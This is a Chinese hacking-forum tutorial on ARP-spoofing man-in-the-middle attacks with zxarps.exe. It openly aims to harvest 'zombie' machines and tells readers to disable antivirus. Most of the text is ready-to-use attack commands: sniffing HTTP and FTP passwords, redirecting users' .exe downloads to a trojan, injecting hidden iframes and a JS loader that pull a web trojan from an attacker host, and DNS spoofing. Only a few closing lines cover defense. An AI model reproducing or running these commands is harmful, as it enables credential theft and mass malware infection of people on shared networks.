[原创] 掛馬到最高境界-----ARP欺騙詳解

掛馬到最高境界-----ARP欺騙詳解
由于系統才出了問題,重安裝系統后,正在進行全盤殺毒,以前的所有黑軟都統統删掉啦,所以不便安裝黑軟啦試驗,所以沒有截圖.希望不影響大家學習!這次要用到工具zxarps.exe,网上都有得下,不過不是免殺得,記得關殺軟! 開始嘍 ARP欺骗是最近新兴的一种欺骗挂马技术,由于以前没有相关工具,所以看似很难,而且尽被高手掌握,今天我就自告奋勇来介绍以下ARP欺骗及其工具的使用. ARP欺骗的危害很大,是挂马艺术的最高境界,杀鸡于无形之中!如果你一不小心掌握了ARP挂马欺骗技术,你就可以轻松得到大量肉鸡,而不用去为了插马而去想方设法拿权限了! ARP欺骗挂马原理:正常时候,A到B,A是访问的正常客户,B是要攻击的服务器,C是被我们控制的主机,ARP中间人攻击的时候,实际上相当于做了一次代理,变成了A到B到C,C到B到A.那么http请求发过来的时候,C判断是哪个客户端发过来的包,转发给B,然后B返回http响应的时候,在http包中插入一段代码,如<iframe>之类的,再将这个包发给正常的客户A,这个就起到了欺骗挂马的作用. 优点:1.可以不用获得目标主机的权限就可以直接在上面挂马,可以获得大量肉鸡. 2.非常隐蔽,不改动任何目标主机的页面或是配置,在网络传输做代理过程中直接插马. ★3.可以最大化利用,只要获得一台同一LAN下主机的控制权,就可以控制整个LAN下的机器.如果你控制的是服务器,而且外部网络可以访问这台服务器,对外开放了我们指定的80端口，那么外部电脑只要访问了这台服务器开放的网站，用户访问到的页面也会被挂上马的！但是源码了却没有挂马语句~! 所以只要我们攻陷了一台服务器，再用ARP欺骗，加上如果网站流量大，那么抓大量肉鸡还会难吗？我上次就抓了很多肉鸡，才两千多只，自己就被DDOS了！郁闷～ 下面为大家介绍一款工具，非常强大的ARP欺骗工具：zxarps.exe. zxarp.exe 1.在zxarp目录下直接输入zxarps.exe，不带参数，可以显示参数帮助信息。 2.参数介绍： -idx [integer]，表示网卡索引号，用法 -idx 0 -ip [ip],表示ip，可以是单个ip，如-ip 192.168.0.1，也可以是一个ip段，如-ip 192.168.0.1-192.168.0.3，或者 是多个ip隔开，如-ip 192.168.0.1,192.168.0.3,192.168.0.5。 -sethost [ip],表示默认网关，可以换成别的ip。用法-sethost 192.168.0.1,这个一般不用到 -port [integer]，表示端口，可以是一个端口，也可以是一段端口或多个端口用“,”隔开，用法：-port 80，-port 21-80，-port 21,35,80,3389,4899 -hostname，意思是探测目标的主机名称 -logfilter [string]，表示保存嗅探到的数据的条件，后面跟的字符串要用双引号括起来 ， 必须以“_”或“+”或“-”做前缀，用“,”隔开，多个条件用“|”分开，用“+”做前缀的数据要都符合条件才写入文件，以“-”做前缀的数据不写入文件，以“_”做前缀的数据只要符合一个条件就写入文件。 用法：-logfilter "+post,+username,+password",表示数据要同时出现“post”、“username”、“password” 三条字段时才写入文件保存。-logfilter "_post,_username,_password",表示数据中只要出现了三个中任一个字段时就保存。多个条件可配合使用，如-logfilter "+post,+username,+password|_user,_past" -save_n [filename.log]：保存设置，后面跟两个参数，_a：以ASCII模式写入文件，和 _h,以HEX模式写入文件。用法：-save_a 123.log -hacksite [www/ip]：指定要插入代码的网站或域名或IP，多个时用“,”分开，没指定则影响所有站点 -insert [html code]：插入Html代码，用引号引起来。（挂马专用），如-insert "<iframe src='http://…….htm' width=9 height-0>" -postfix [string]：关注的后缀名，要用引号引起来。用法：-postfix ".exe,.rar,.zip" -hackURL <A href="http://172.16.3.5/bbs/：发现有关注的后缀时跳转到指定URL，和上面一条配合使用，如-postfix" target=_blank ?.exe? -hackurl http://……/ -filename muma.htm。表示当别人下载exe文件时就转向我们的地址去下载muma.htm -filename >：发现有关注的后缀时跳转到指定URL，和上面一条配合使用，如-postfix ".exe" -hackurl http://……/ -filename muma.htm。表示当别人下载exe文件时就转向我们的地址去下载muma.htm -filename [filename]：和上面一条配合使用，连接起来为-hackurl [] -filename [],表示某个地址里的某个文件。 -hackdns [string]：DNS欺骗专用，修改UDP报文，多个用“,”隔开。用法：-hackdns "www.google.com|http://192.168.1.3,www.baidu.com|http//192.168.1.3"，当别人访问google和百度时就会转向我们的地址。 -interval [ms],定时欺骗时间间隔，默认为3秒，单位为毫秒 -spoofmode [n],其中n=1或2或3，这个是设定欺骗模式，1表示欺骗网关，2表示欺骗目标主机，3表示双向欺骗 -speed [kb]：最牛的功能，限定指定IP或IP段的网络总宽带，配合-ip [ip]使用。 3.嗅探其实把上面的参数语法结合起来就组成了各种功能。例如嗅探，可以写成 zxarps.exe -idx 0 -ip 192.168.0.1-192.168.0.100 -port 80 -save_h sniff.log，什么意思各位自己体会吧。还可以把其它参数结合起来，比如保存文件的过滤,写成 zxarps.exe -idx 0 -ip 192.168.0.1-192.168.0.100 -port 80 -logfilter "+post,+username,+password" -save_h sniff.log 这个就可以用来嗅探HTTP网页密码，而稍微修改以下就可以来嗅探FTP密码了 zxarps.exe -idx 0 -ip 192.168.0.1-192.168.0.100 -port 21，2121 -spoofmode 2 -logfilter "_username,_password" -save_a sniff.log 4.修改别人下载的文件 zxarps.exe -idx 0 -ip 192.168.0.1-192.168.0.100 -spoofmode 3 postfix ".exe,.rar,.zip" -hackurl http://192.168.1.3/ -filename muma.exe 5.arp欺骗批量查马 zxarps.exe -idx 0 -ip 192.168.0.1-192.168.0.100 -port 80 -insert "<iframe src='http://192.168.1.3/muma.htm' width=0 height=0>" 当被欺骗的每台电脑浏览任何网站时，都会在其中插入我们的挂马语句。 6.DNS欺骗 zxarps.exe -idx 0 -ip 192.168.0.1-192.168.0.100 -hackdns "www.google.com|http://192.168.1.3" 7.限制宽带 zxarps.exe -idx 0 -ip 192.168.1.4-192.168.1.50 -speed 50 这样192.168.1.4-192.168.1.50ip段的的总宽带就变成50kb了！ 这里补充一点，第5点的挂马方法有漏洞，直接插入挂马代码后，会导致被查的网页变为空白。所以我们实际挂马的时候不能使用这个语句，要用js挂马。建立一个js文件，并保存为1.js内容如下： document.write("<iframe src=http://…….muma.htm width=0 height=0></iframe> 其中muma.htm为网马然后在arp欺骗中就要这样写了： zxarps.exe -idx 192.168.1.4-192.168.1.50 -port 80 -insert ",script language=javascript src=http://……/1.js></script>" 这种挂马方式不会对网页有什么影响，所以就请放心使用！ 但是ARP欺骗的攻击方式也有局限性比如管理员经常不登录，那么很不容易监听到密码，如果目标主机上只开放了一个管理端口，且80端口上只有静态页面，那么就很难利用了。如果管理端口是3389，也是不容易监听到密码的。 最后，关于arp欺骗的防护建立一个批处理文件，内容如下： @echo OFF arp -s 默认网关ip 网关MAC地址 写好后放到启动里再重启就OK了另外也可以使用ARP防火墙来解决，总之发现ARP欺骗时第一个反映就是拔网线…………